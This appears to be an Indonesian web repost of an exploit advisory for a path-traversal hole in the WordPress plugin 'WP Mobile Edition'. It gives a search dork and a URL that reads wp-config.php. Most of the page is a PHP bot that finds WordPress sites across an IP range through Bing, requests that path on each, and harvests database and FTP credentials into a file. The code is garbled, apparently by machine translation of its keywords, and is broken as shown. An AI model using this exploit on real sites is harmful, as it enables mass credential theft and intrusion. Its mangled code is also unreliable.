Plugin WordPress 'WP Mobile Edition' LFI Vulnerability
# Exploit Judul: WordPress Plugin 'WP Mobile Edition' LFI Vulnerability #
# Tanggal: 6 Juni 2015 #
# Exploit Penulis: Virus OS #
# Google Dork: iilnurl:? Fdx_switcher = Mobe #
# Penjual Homepage: https://wordpress.org/plugins/wp-mobile-edition/ #
# Software Link: https://downloads.wordpress.org/plugin/wp-mobile-edition.2.2.7.zip #
# Versi: WP Mobile Edition Versi 2.2.7 #
# Diuji pada: jendela #
########################################
Keterangan:
Wordpress Plugin 'WP Mobile Edition' tidak menyaring data sehingga kita bisa mendapatkan file configration di jalan
<Site.com/wp-content/themes/mTheme-Unus/css/css.php?files = .. / .. / .. / .. / wp-config.php>
# Exploite Kode:
<? php
// Virus OS
set_time_limit (0);
error_reporting (0);
echo "############### Fdx_Switcher Minibot Dengan ip Rentang ################## \ n \ n";
print "Kode By _
__ _ (_) _ __ _ _ ___ ___ ___
\ \ / / | '__ | | | / __ | / _ \ / __ |
\ V / | | | | | _ | \ __ \ | (_) \ __ \
\ _ / | _ | _ | \ __, _ | ___ / \ ___ / | ___ /
Menyapa >> CoderLeeT | Fallag Gassrini | Taz | S4hk | Sir Matrix | Kuroi'SH
";
echo "Follow Me On FaceBook: https://www.facebook.com/VirusXOS\n\n";
echo "Follow Me On FaceBook: https://www.facebook.com/Weka.Mashkel007\n\n";
echo "#################### Selamat Guru Virus OS ################ \ n \ n";
echo "Server Sasaran IP:";
$ ip = trim (fgets (STDIN, 1024));
$ ip = meledak (, $ ip '.');
. '.'.. '.'. $ ip = $ ip [0] $ ip [1] $ ip [2]. '.';
untuk ($ i = 0; $ i <= 255; $ i ++)
{
$ situs = array_map ("situs", bing ("ip: $ ip $ i wordpress."));
$ un = array_unique ($ situs);
echo "[+] Scanning ->", $ ip $ i, "\ n";. "."
echo "Ditemukan:" Count ($ situs) "situs \ n \ n";.
foreach ($ un sebagai $ pok) {
$ host = findit ($ file, "DB_HOST ','", "');");
$ db = findit ($ file, "DB_NAME ','", "');");
$ kita = findit ($ file, "DB_USER ','", "');");
$ pw = findit ($ file, "DB_PASSWORD ','", "');");
$ bda = "http: // $ pok";
$ linkof = '/ wp-content / themes / mTheme-Unus / css / css.php file = .. / .. / .. / .. / wp-config.php?';
$ dn = ($ bda) ($ linkof).;
$ file = @ file_get_contents ($ dn);
if (eregi ('DB_HOST', $ file) dan! eregi ('FTP_USER', $ file)) {
.. echo "[+] Scanning =>" $ bda "\ n \ n";
echo "[+] DB NAME:" .findit ($ file, "DB_NAME ','", "');") "\ n \ n";.
echo "[+] DB USER:" .findit ($ file, "DB_USER ','", "');") "\ n \ n";.
echo "[+] DB LULUS:". .findit ($ file, "DB_PASSWORD ','", "');") "\ n \ n";
echo "[+] DB host:" .findit ($ file, "DB_HOST ','", "');") "\ n \ n";.
$ db = "[+] DB NAME:". .findit ($ file, "DB_NAME ','", "');") "\ n \ n";
$ user = "[+] DB PENGGUNA:". .findit ($ file, "DB_USER ','", "');") "\ n \ n";
$ pass = "[+] DB LULUS:". .findit ($ file, "DB_PASSWORD ','", "');") "\ n \ n";
$ host = "[+] DB host:". .findit ($ file, "DB_HOST ','", "');") "\ n \ n";
$ ux = "" $ bda.. "\ r \ n";
$ ux1 = "". $ db. "\ r \ n";
$ UX2 = "" $ user.. "\ r \ n";
$ ux3 = "". $ lulus. "\ r \ n";
$ ux4 = "" $ host.. "\ r \ n";
$ menyelamatkan = fopen ('exploited.txt', 'ab');
fwrite ($ simpan, "$ ux");
fwrite ($ simpan, "$ ux1");
fwrite ($ simpan, "$ UX2");
fwrite ($ simpan, "$ ux3");
fwrite ($ simpan, "$ ux4");
}
elseif (eregi ('DB_HOST', $ file) dan eregi ('FTP_USER', $ file)) {
echo "user FTP:" .findit ($ file, "FTP_USER ','", "');") "\ n \ n";.
echo "FTP lulus:" .findit ($ file, "FTP_PASS ','", "');") "\ n \ n";.
echo "FTP host:" .findit ($ file, "FTP_HOST ','", "');") "\ n \ n";.
}
else {echo $ bda ": Eksploitasi gagal \ n \ n";.}
}
}
Fungsi findit ($ mytext, $ StartTag, $ EndTag) {
$ posLeft = stripos ($ mytext, $ StartTag) + strlen ($ StartTag);
$ posRight = stripos ($ mytext, $ EndTag, $ posLeft + 1);
pulang substr ($ mytext, $ posLeft, $ posRight- $ posLeft);
}
situs function ($ link) {
kembali str_replace ("", "", parse_url ($ link PHP_URL_HOST));
}
Fungsi bing ($ apa) {
untuk ($ i = 1; $ i <= 2000; $ i + = 10) {
$ ch = curl_init ();
curl_setopt ($ ch, CURLOPT_URL, "http://www.bing.com/search?q=".urlencode($what)."&first=".$i."&FORM=PERE");
curl_setopt ($ ch, CURLOPT_USERAGENT, "msnbot / 1.0 (http://search.msn.com/msnbot.htm)");
curl_setopt ($ ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ ch, CURLOPT_COOKIEFILE, getcwd () '/ cookie.txt'.);
curl_setopt ($ ch, CURLOPT_COOKIEJAR, getcwd () '/ cookie.txt'.);
curl_setopt ($ ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ ch, CURLOPT_FOLLOWLOCATION, 1);
$ data = curl_exec ($ ch);
preg_match_all ('#;? a = (*) "h =" #.', $ data, $ link);
foreach ($ link [1] sebagai $ link) {
$ allLinks [] = $ Link;
}
jika istirahat (preg_match ('# "sw_next" #', $ data)!);
}
if (! empty ($ allLinks) && is_array ($ allLinks)) {
kembali array_unique (array_map ("urldecode", $ allLinks));
}
}
Disclaimer: gambar, artikel ataupun video yang ada di web ini terkadang berasal dari berbagai sumber media lain. Hak Cipta sepenuhnya dipegang oleh sumber tersebut. Jika ada masalah terkait hal ini, Anda dapat menghubungi kami di halaman ini.